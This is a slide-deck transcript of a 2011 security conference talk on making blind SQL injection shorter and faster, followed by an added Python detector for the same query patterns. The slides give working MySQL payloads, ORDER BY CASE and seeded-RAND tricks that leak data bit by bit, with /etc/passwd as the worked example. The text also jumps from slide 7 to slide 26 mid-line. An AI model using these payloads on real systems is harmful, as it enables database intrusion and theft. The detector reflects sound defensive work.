
Harder Faster Stronger

Jul 03, 2015




Talk done by Luke Jahnke and me in 2011 at Ruxcon on optimisation of SQL injections
1. Louis Luke

2. SELECT user FROM mysql.user LIMIT 2
Security consultants working for Securus Global in Melbourne
Have done/are doing a lot of web pentesting
Research focus on web security: web attacks, Web Application Scanners (WAS) testing, Web Application Firewall (WAF) testing, (in)secure coding

3. Why do we want to optimize SQL injections?
Stealth
Retrieving a large amount of data
Being faster
Because you're bored using sqlmap
Because it's fun

4. What can be optimized?
Length of the injection
Number of requests to retrieve information
Optimize retrieval strategy
Optimizations on information

5. Reducing injection length (MySQL)
SUBSTR() instead of SUBSTRING()
MID() instead of SUBSTR()
Using CRC32(): instead of using the long string, you replace it with its CRC32

6. Reducing injection length (MySQL)
SELECT @@version instead of SELECT VERSION()
&&1 instead of AND 1=1
&1 instead of &&1
||1 instead of OR 1=1
|1 instead of ||1 (fails for NULL|1)

7. Reducing injection length (MySQL)
!id instead of id=0
> instead of

4 states
order by can sort by multiple columns: order by firstname, lastname => more states (8 if lucky)
Color Blind SQLi (copyright Nicolas Collignon)

26. Exploitation
For each combination of order by: fingerprint the response (with cast for id)
md5 for global warming
SQL has a CASE statement:
CASE (ASCII(substring((select @@version),1,1))&3)
WHEN 0 then column1
WHEN 1 then column2
WHEN 2 then column3
WHEN 3 then column4
END

27. Exploitation
## Retrieving ----XXXX
CASE (ASCII(substring((select @@version),1,1))&3) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC,
CASE ((ASCII(substring((select @@version),1,1))&12)>>2) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC
## Retrieving XXXX----
CASE ((ASCII(substring((select @@version),1,1))&48)>>4) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC,
CASE ((ASCII(substring((select @@version),1,1))&192)>>6) when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC
Securus Global 2010

28. Exploitation
SELECT id,username FROM users
id  username
1   admin
2   moderator
3   guest

29. Exploitation
SELECT id,username FROM users ORDER BY RAND()
id  username
2   moderator
1   admin
3   guest

30. Exploitation
SELECT id,username FROM users ORDER BY RAND()
id  username
3   guest
2   moderator
1   admin

31. Exploitation
SELECT id,username FROM users ORDER BY RAND(1)
id  username
3   guest
1   admin
2   moderator

32. Exploitation
SELECT id,username FROM users ORDER BY RAND(1)
id  username
3   guest
1   admin
2   moderator

33. Exploitation
RAND seed  Order of id
0          1,2,3
1          3,1,2
2          2,3,1
3          3,2,1
4          1,2,3

34. Exploitation
RAND seed  Order of id  Bits
0          1,2,3        00
1          3,1,2        01
2          2,3,1        10
3          3,2,1        11

35. Exploitation
RAND(CONV(CONCAT(IF((true/false),0,1),IF((true/false),0,1)),2,10))

36. Exploitation

37. Statistics
Rows  Bits
2-6   1
7     5
8     5
9     9
10    11
11    12
12    13
13    17

38. Real World Scenario
7 rows
Can retrieve 5 bits per request
1830 characters (14640 bits) in /etc/passwd
Retrieved with 2930 requests
740 characters for compressed /etc/passwd
Retrieved with 1186 requests

39. Source available tomorrow at:

40. Questions?
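As an added example, not part of the slides and not the speakers' tool, the detector below shows how a defender can spot the two ORDER BY constructs the deck relies on in a query log: a CASE that selects the sort column from a character extracted out of a subquery or @@variable (slides 26 and 27), and RAND() seeded from an expression rather than a literal (slide 35). The log lines, the function names (order_by_clause, classify, scan) and the rule labels are all assumptions of this example; the input is constructed, with two benign queries included to show the rules do not fire on ordinary ORDER BY CASE or ORDER BY RAND() usage.

```python
import re

# Constructed sample query-log lines (not taken from the slides). The third and
# fourth mimic the ORDER BY patterns described in the talk; the others are benign.
SAMPLE_QUERIES = [
    "SELECT id,username FROM users ORDER BY id",
    "SELECT id,username FROM users ORDER BY RAND()",
    "SELECT id,username FROM users ORDER BY CASE (ASCII(substring((select @@version),1,1))&3) "
    "when 0 then id when 1 then name when 2 then age when 3 then groupid END ASC",
    "SELECT id,username FROM users ORDER BY RAND(CONV(CONCAT(IF((1=1),0,1),IF((1=2),0,1)),2,10))",
    "SELECT id,username FROM users ORDER BY CASE WHEN role='admin' THEN 0 ELSE 1 END, username",
    "SELECT id,username FROM users ORDER BY RAND(42)",
]

ORDER_BY_RE = re.compile(r"\border\s+by\b(.*)$", re.IGNORECASE | re.DOTALL)
CASE_RE = re.compile(r"\bcase\b", re.IGNORECASE)
# Functions that pull a single character/byte out of a string (slide 5 lists the aliases).
CHAR_FUNCS_RE = re.compile(r"\b(ascii|ord|substr|substring|mid)\s*\(", re.IGNORECASE)
# A subquery or a server variable inside the sort expression: the data being read out.
SUBQUERY_OR_VAR_RE = re.compile(r"\(\s*select\b|@@\w+", re.IGNORECASE)
RAND_CALL_RE = re.compile(r"\brand\s*\(", re.IGNORECASE)


def _paren_body(s, open_idx):
    """Return the text inside the parenthesis opened at s[open_idx], honouring nesting."""
    depth = 0
    for i in range(open_idx, len(s)):
        if s[i] == "(":
            depth += 1
        elif s[i] == ")":
            depth -= 1
            if depth == 0:
                return s[open_idx + 1:i]
    return s[open_idx + 1:]  # unbalanced input: take the rest of the string


def order_by_clause(sql):
    """Return everything after the first ORDER BY, or None if the query has none."""
    m = ORDER_BY_RE.search(sql)
    return m.group(1).strip() if m else None


def classify(sql):
    """Return the list of rule labels that fire on one logged query (empty = benign)."""
    findings = []
    clause = order_by_clause(sql)
    if clause is None:
        return findings

    # Rule 1: CASE choosing the sort column from an extracted character of
    # a subquery/@@variable (the column-choice technique of slides 26-27).
    if (CASE_RE.search(clause) and CHAR_FUNCS_RE.search(clause)
            and SUBQUERY_OR_VAR_RE.search(clause)):
        findings.append("order-by CASE keyed on extracted character")

    # Rule 2: RAND() whose seed is an expression rather than empty or a literal
    # (the seed-ordering technique of slide 35). RAND() and RAND(42) are left alone.
    for m in RAND_CALL_RE.finditer(clause):
        seed = _paren_body(clause, m.end() - 1).strip()
        if seed and not re.fullmatch(r"\d+", seed):
            findings.append("RAND() seeded from an expression")
            break

    return findings


def scan(queries):
    """Map each flagged query to its findings; benign queries are omitted."""
    return {q: classify(q) for q in queries if classify(q)}


if __name__ == "__main__":
    for query, labels in scan(SAMPLE_QUERIES).items():
        print(f"{', '.join(labels)}\n    {query}")
```

The two rules are deliberately structural rather than keyword-based: a CASE in ORDER BY is ordinary SQL, and so is RAND(); what marks the patterns from the talk is the combination of a sort expression that both reads data from a subquery or server variable and turns it into a choice of column or seed. Tuning would consist of adding the application's own functions to CHAR_FUNCS_RE or whitelisting known report queries.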